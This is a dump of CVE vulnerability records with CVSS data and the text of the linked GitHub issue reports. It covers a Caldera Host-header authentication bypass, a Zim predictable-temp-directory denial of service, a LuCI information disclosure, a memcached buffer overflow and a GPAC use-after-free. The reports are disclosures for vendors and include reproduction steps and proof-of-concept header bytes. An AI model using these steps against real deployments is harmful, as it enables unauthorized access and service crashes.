{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/compare/2.6.4...2.6.5" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/issues/1405" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/pull/1407" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/releases/tag/2.6.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/compare/2.6.4...2.6.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/issues/1405" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/pull/1407" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/releases/tag/2.6.5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:*", "matchCriteriaId": "B89E7BC3-A4A3-4A5B-89C4-19CC70BAFE75", "versionEndExcluding": "2.6.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "290" ]
290
https://github.com/mitre/caldera/issues/1405
[ "Third Party Advisory" ]
github.com
[ "mitre", "caldera" ]
Hi guys, While checking our your API I've found a serious security flaw, which allows any unauthenticated user to perform any kind of API requests, which basically makes the whole tool and therefore any agents on end hosts exposable to anyone having access to the Caldera REST API. The following function is responsible for checking authentication in your code: ```python async def check_permissions(self, group, request): """ Check if a request is allowed based on the user permissions :param request: :return: None """ try: if request.headers.get('KEY') == self.get_config('api_key'): return True elif self.bypass in request.host: return True await check_permission(request, group) except (HTTPUnauthorized, HTTPForbidden): raise web.HTTPFound('/login') ``` Basically it allows to bypass authentication if `self.bypass` is contained within `request.host` (which is set to `localhost:` per default). You are using the aiohttp library, in which `host` is usually the Host header of the http request (see https://docs.aiohttp.org/en/v3.0.1/web_reference.html). This works fine if you are performing a curl request from localhost for example, but be aware that the HTTP Host header is mutable for any request performed by a user. So if you just overwrite the Host header with "localhost:8888" while performing a request to a public IP for example Caldera assumes you are performing the request to localhost and therefore disables authentication checks. Here is a POC in Postman: <img width="1134" alt="Screenshot 2020-03-18 at 15 53 51" src="https://user-images.githubusercontent.com/13811302/76975457-d91c1900-6932-11ea-8b14-5579202e5769.png"> Body of the request: <img width="1129" alt="Screenshot 2020-03-18 at 15 53 59" src="https://user-images.githubusercontent.com/13811302/76975492-e6390800-6932-11ea-9cf3-fba3a08a9e7b.png"> Response: <img width="1130" alt="Screenshot 2020-03-18 at 15 54 06" src="https://user-images.githubusercontent.com/13811302/76975509-edf8ac80-6932-11ea-8886-bf80b142ad24.png"> As you can see I've succesfully performed an API request while using a IP within my network and not localhost. I've set the Host header to localhost and were able to fetch details without any authentication. That really is a serious flaw in the application, if I have running productive agents an attacker can execute arbitrary commands in my network. I'd suggest removing the no-authentication "feature" for requests to localhost completely. Thanks!
Serious Security Flaw: API Requests from localhost
https://api.github.com/repos/mitre/caldera/issues/1405/comments
3
2020-03-18T15:12:57Z
2020-03-19T13:55:50Z
https://github.com/mitre/caldera/issues/1405
583,800,223
1,405
1,124
CVE-2020-10870
2020-03-23T20:15:11.807
Zim through 0.72.1 creates temporary directories with predictable names. A malicious user could predict and create Zim's temporary directories and prevent other users from being able to start Zim, resulting in a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "cve@mitre.org", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zim-wiki:zim:*:*:*:*:*:*:*:*", "matchCriteriaId": "A838A5FB-70E7-4A1A-A723-48DEF9494599", "versionEndExcluding": null, "versionEndIncluding": "0.72.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "330" ]
330
https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028
[ "Third Party Advisory" ]
github.com
[ "zim-desktop-wiki", "zim-desktop-wiki" ]
**Description** Zim creates temporary directories with predictable names. A malicious user could predict and create Zim's temporary directories and prevent other users from being able to start Zim, resulting in a denial of service. **Steps to Reproduce** 1. Create two users: user1 and user2. 1. As user1: `mkdir /tmp/zim-user2` 1. As user2: Start Zim Zim will attempt to change the permissions of /tmp/user2 to 0700. Because /tmp/user2 is actually owned by user1, the call to `os.chmod()` will fail and Zim will crash. **Workaround** An affected user can set the $TMP or $TMPDIR environment variables to point to somewhere that is not world-writable (e.g. `/home/USER/tmp`). **Version Affected** 0.42-beta1 and later **Operating System** Linux **Severity** Low
Predictable /tmp/zim-USER directory allows for denial of service
https://api.github.com/repos/zim-desktop-wiki/zim-desktop-wiki/issues/1028/comments
1
2020-03-06T22:22:48Z
2020-06-06T13:20:48Z
https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028
577,207,106
1,028
1,125
CVE-2020-10871
2020-03-23T20:15:11.917
In OpenWrt LuCI git-20.x, remote unauthenticated attackers can retrieve the list of installed packages and services. NOTE: the vendor disputes the significance of this report because, for instances reachable by an unauthenticated actor, the same information is available in other (more complex) ways, and there is no plan to restrict the information further
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3563#issuecomment-578522860" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3653#issue-567892007" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3766" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3563#issuecomment-578522860" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3653#issue-567892007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3766" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openwrt:luci:git-20.049.11521-bebfe20:*:*:*:*:*:*:*", "matchCriteriaId": "2E22DB7F-4E58-4783-A9FA-72786FB1E0C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:openwrt:luci:git-20.078.22902-0ed0d42:*:*:*:*:*:*:*", "matchCriteriaId": "C55B7834-5998-4FFD-84B2-9EF180EA07E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/openwrt/luci/issues/3563#issuecomment-578522860
[ "Patch", "Third Party Advisory" ]
github.com
[ "openwrt", "luci" ]
LuCI pages with sysauth=false (e.g. status pages that should work even for an user that is not logged in) are broken on LuCI master. The symptom is that when you access the page with "sysauth=false" attribute, the menu disappears, as in: not even nodes that are also sysauth=false show up. What should happen: the menu should list all pages, always, and require authentication if you try to access one of them while lacking the required credentials. Translations are also broken, and doubly so: 1. They try to XHR something from a node that is below /admin/, even if you are on a node on an entirely different subtree (like say, a /status node that should work unauthenticated and be the first page the user gets when he connects to the modem). 2. Whatever the translation stuff tries to fetch is hiding behind a sysauth=true node, which renders it useless for any sysauth=false page [if the user is unauthenticated] Maybe the /l10n/ or /i18n/ namespace (or even wherever luci-static ends up) should be used for anything the i18n mechanism needs? It really doesn't make sense to have it tied to /admin/.
luci-base: menu and i18n plays very BADLY with sysauth=false in master
https://api.github.com/repos/openwrt/luci/issues/3563/comments
7
2020-01-25T21:59:41Z
2020-04-13T16:01:25Z
https://github.com/openwrt/luci/issues/3563
555,144,202
3,563
1,126
CVE-2020-10871
2020-03-23T20:15:11.917
In OpenWrt LuCI git-20.x, remote unauthenticated attackers can retrieve the list of installed packages and services. NOTE: the vendor disputes the significance of this report because, for instances reachable by an unauthenticated actor, the same information is available in other (more complex) ways, and there is no plan to restrict the information further
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3563#issuecomment-578522860" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3653#issue-567892007" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3766" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3563#issuecomment-578522860" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3653#issue-567892007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3766" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openwrt:luci:git-20.049.11521-bebfe20:*:*:*:*:*:*:*", "matchCriteriaId": "2E22DB7F-4E58-4783-A9FA-72786FB1E0C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:openwrt:luci:git-20.078.22902-0ed0d42:*:*:*:*:*:*:*", "matchCriteriaId": "C55B7834-5998-4FFD-84B2-9EF180EA07E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/openwrt/luci/issues/3653#issue-567892007
[ "Exploit", "Third Party Advisory" ]
github.com
[ "openwrt", "luci" ]
On commit r11655-a283b1788a the topmenu "<header>" is shown while no user logged in. ![image](https://user-images.githubusercontent.com/5218298/74883188-b2d57e80-5370-11ea-9e09-ef416931fdb6.png) Any idea how to solve this issue? Thank you.
Header topmenu shown logged out
https://api.github.com/repos/openwrt/luci/issues/3653/comments
8
2020-02-19T22:37:08Z
2020-02-26T11:39:46Z
https://github.com/openwrt/luci/issues/3653
567,892,007
3,653
1,127
CVE-2020-10871
2020-03-23T20:15:11.917
In OpenWrt LuCI git-20.x, remote unauthenticated attackers can retrieve the list of installed packages and services. NOTE: the vendor disputes the significance of this report because, for instances reachable by an unauthenticated actor, the same information is available in other (more complex) ways, and there is no plan to restrict the information further
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3563#issuecomment-578522860" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3653#issue-567892007" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3766" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3563#issuecomment-578522860" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3653#issue-567892007" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/openwrt/luci/issues/3766" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openwrt:luci:git-20.049.11521-bebfe20:*:*:*:*:*:*:*", "matchCriteriaId": "2E22DB7F-4E58-4783-A9FA-72786FB1E0C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:openwrt:luci:git-20.078.22902-0ed0d42:*:*:*:*:*:*:*", "matchCriteriaId": "C55B7834-5998-4FFD-84B2-9EF180EA07E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/openwrt/luci/issues/3766
[ "Exploit", "Third Party Advisory" ]
github.com
[ "openwrt", "luci" ]
Recent openwrt builds show the administration menu to unauthenticated guests: an attacker would be able to know the presence of installed packages and services on the box. version banner: _Powered by LuCI Master (git-20.078.22902-0ed0d42) / OpenWrt SNAPSHOT r12643-213250b56b_ ![image](https://user-images.githubusercontent.com/58654103/77004518-8147d700-695f-11ea-9547-1518a5350c6b.png)
security: information disclosure to unauthenticated guest
https://api.github.com/repos/openwrt/luci/issues/3766/comments
21
2020-03-18T20:35:13Z
2021-08-23T03:21:17Z
https://github.com/openwrt/luci/issues/3766
583,986,784
3,766
1,128
CVE-2020-10931
2020-03-24T15:15:12.107
Memcached 1.6.x before 1.6.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted binary protocol header to try_read_command_binary in memcached.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/commit/02c6a2b62ddcb6fa4569a591d3461a156a636305" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/issues/629" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/wiki/ReleaseNotes162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/commit/02c6a2b62ddcb6fa4569a591d3461a156a636305" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/issues/629" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/memcached/memcached/wiki/ReleaseNotes162" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B224531-B654-4A70-A6B9-476B6A03D1DF", "versionEndExcluding": "1.6.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.6.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/memcached/memcached/issues/629
[ "Exploit", "Third Party Advisory" ]
github.com
[ "memcached", "memcached" ]
Hi, Memcached team, Recently, I revealed a buffer overflow vulnerability which may cause DOS attack. The exploit details can be found as following. ### Affect Version memcached-1.6.0 memcached-1.6.1 ### Root cause file location: memcached.c:6156-6187 ![image](https://user-images.githubusercontent.com/29170518/77297732-b15af580-6d24-11ea-8d4d-ca9befffeae5.png) ### Code Audit ```c 6178 char extbuf[sizeof(c->binary_header) + BIN_MAX_EXTLEN]; 6179 memcpy(extbuf + sizeof(c->binary_header), c->rcurr + sizeof(c->binary_header), **extlen**); ``` in line 6179, since there is no mechanism to verify the parameter's length, in this case, the length of "**extlen**" when calling memcpy function, It will cause buffer overflow if large value assigned to the **extlen** variable. ### POC ``` 0x80 0x01 [0x00 0x00] keylen [0x30] extlen 0x00 0x00 x00 ``` for the POC snippet, first, if I assign a large value to the variable **extlen**, on the other hand, in order to bypass the validation of data packet which sent in following code snippet, `6156 if (c->rbytes < keylen + extlen + sizeof(c->binary_header))` we can construct a very large data packet and send it to the server running **memcached** 1.6.0 or 1.6.1 anonymously. After that, the program will crash because of the issue mentioned above. Note: Please confirm this issue ASAP. Besides, just letting you know, I am gonna submit this issue to CVE mitre. Please let me if you have any questions. Sincerely, Icejl
(Remote DOS attack) 0day buffer overflow vulnerability reveal
https://api.github.com/repos/memcached/memcached/issues/629/comments
6
2020-03-23T09:21:26Z
2020-03-24T01:07:22Z
https://github.com/memcached/memcached/issues/629
586,054,883
629
1,129
CVE-2019-20628
2020-03-24T19:15:20.947
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains a Use-After-Free vulnerability in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1ab4860609f2e7a35634930571e7d0531297e090" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/98b727637e32d1d4824101d8947e2dbd573d4fc8" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1269" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/1ab4860609f2e7a35634930571e7d0531297e090" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/98b727637e32d1d4824101d8947e2dbd573d4fc8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1269" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/1269
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found an UAF on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_uaf_mpegts.c:2183 Command: MP4Box -info $PoC ASAN says: ~~~ ==12341==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000efb0 at pc 0x00000098190d bp 0x7ffd5d0bb3c0 sp 0x7ffd5d0bb3b0 WRITE of size 2 at 0x60300000efb0 thread T0 #0 0x98190c in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2183 #1 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #2 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #3 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #4 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #5 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #6 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #7 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #8 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #9 0x7f58ce76782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) 0x60300000efb0 is located 0 bytes inside of 26-byte region [0x60300000efb0,0x60300000efca) freed by thread T0 here: #0 0x7f58d022d961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x972421 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1730 previously allocated by thread T0 here: #0 0x7f58d022d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x972081 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1705 ~~~ Thanks, Manh Dung
Use After Free (mpegts.c:2183)
https://api.github.com/repos/gpac/gpac/issues/1269/comments
1
2019-07-06T00:10:37Z
2019-07-07T15:59:17Z
https://github.com/gpac/gpac/issues/1269
464,799,448
1,269
1,130
CVE-2019-20629
2020-03-24T19:15:21.007
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains a heap-based buffer over-read in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
